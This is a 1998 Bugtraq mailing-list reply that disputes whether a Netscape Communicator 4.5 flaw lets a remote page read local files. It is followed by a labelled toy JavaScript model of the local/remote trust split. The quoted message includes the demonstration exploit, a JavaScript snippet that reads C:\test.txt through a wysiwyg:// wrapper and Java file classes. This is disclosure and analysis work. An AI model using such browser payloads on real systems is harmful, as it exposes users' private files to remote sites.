[8629] in bugtraq


Re: Netscape Communicator 4.5 can read local files

daemon@ATHENA.MIT.EDU (Ryan Russell)
Wed Nov 25 00:15:36 1998

Date: 	Tue, 24 Nov 1998 20:23:25 -0800
Reply-To: Ryan Russell <Ryan.Russell@SYBASE.COM>
From: Ryan Russell <Ryan.Russell@SYBASE.COM>
X-To:         Bill Lavalette <BillL@METAINFO.COM>
To: BUGTRAQ@NETSPACE.ORG

It's vastly different.  Did you try creating c:\test.txt and putting
something in it, and going to that page?  Notice that it pops
the first line in a dialog box.  That means it has that info
under programmatic control, and can send it across the network
back to the web server, exactly as claimed in the original
advisory.

Contrast that with (you) opening your c: drive with Communicator.
You can browse local files, but only you get to see the contents,
and that window isn't under any kind of programmatic control
from other windows... at least that's how it's supposed to work.

It's similar to the Java sandbox concept.  Local and signed
content are "trusted" and can do whatever they like, whereas
remotely loaded content are "untrusted" and aren't supposed
to be able to perform certain operations.  When you (well,
Netscape and Microsoft) try to mix the two, invariably mistakes
will be made, and leaks will happen between the two.


                         Ryan






Hi -
this appears to be no different than typing c:\ in the location of any
browser; hardly a security hole in my opinion. The test site did not
prove that this is a potential or current problem.

Bill

>Demonstration is available at:
>http://www.geocities.com/ResearchTriangle/1711/b6.html
>
>The Javascript code is:
>
>sl=window.open("wysiwyg://1/file:///C|/");
>sl2=sl.window.open();
>sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
>file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
>java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
>(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
>
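
Added example, not part of the original messages or the advisory: a toy JavaScript model of the local/remote trust split the reply describes, applied to the wrapper URL form seen in the quoted demo. The function names and the rule that a `wysiwyg://N/` wrapper takes the trust zone of the URL inside it are assumptions made for illustration, not Netscape's code or a statement of the actual root cause.

```javascript
// Toy trust-zone model (added illustration, hypothetical names throughout).
// Assumption: a wrapper such as wysiwyg://<n>/ carries an inner URL, and the
// inner URL is what should decide the trust zone of the document.
const WRAPPER = /^wysiwyg:\/\/\d+\//i;      // wrapper form as in the quoted demo
const LOCAL_SCHEMES = new Set(["file"]);    // schemes treated as the local zone

// Strip any number of wrapper prefixes so the policy sees the real resource.
function unwrap(url) {
  let u = url.trim();
  while (WRAPPER.test(u)) u = u.replace(WRAPPER, "");
  return u;
}

// Classify a URL as "local" (trusted) or "remote" (untrusted).
// unwrapFirst=false models a check that looks only at the outermost scheme.
function zoneOf(url, unwrapFirst = true) {
  const subject = unwrapFirst ? unwrap(url) : url.trim();
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(subject);
  if (!m) return "remote";                  // unparseable: treat as untrusted
  return LOCAL_SCHEMES.has(m[1].toLowerCase()) ? "local" : "remote";
}

// May script in callerUrl's document read or drive targetUrl's window?
// Only the zone crossing is modelled here (no per-host same-origin check):
// remote content must never get programmatic control of local content.
function mayScript(callerUrl, targetUrl, unwrapFirst = true) {
  const caller = zoneOf(callerUrl, unwrapFirst);
  const target = zoneOf(targetUrl, unwrapFirst);
  return !(caller === "remote" && target === "local");
}

// Constructed sample inputs.
const remotePage = "http://www.example.com/page.html";
const wrappedLocal = "wysiwyg://1/file:///C|/";

console.log(zoneOf(wrappedLocal));                       // zone after unwrapping
console.log(mayScript(remotePage, wrappedLocal));        // strict check
console.log(mayScript(remotePage, wrappedLocal, false)); // outer-scheme-only check
```

In this model the outer-scheme-only check classifies the wrapped local directory as remote and lets the remote page script it, which is the kind of leak between trusted and untrusted content the reply warns about.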
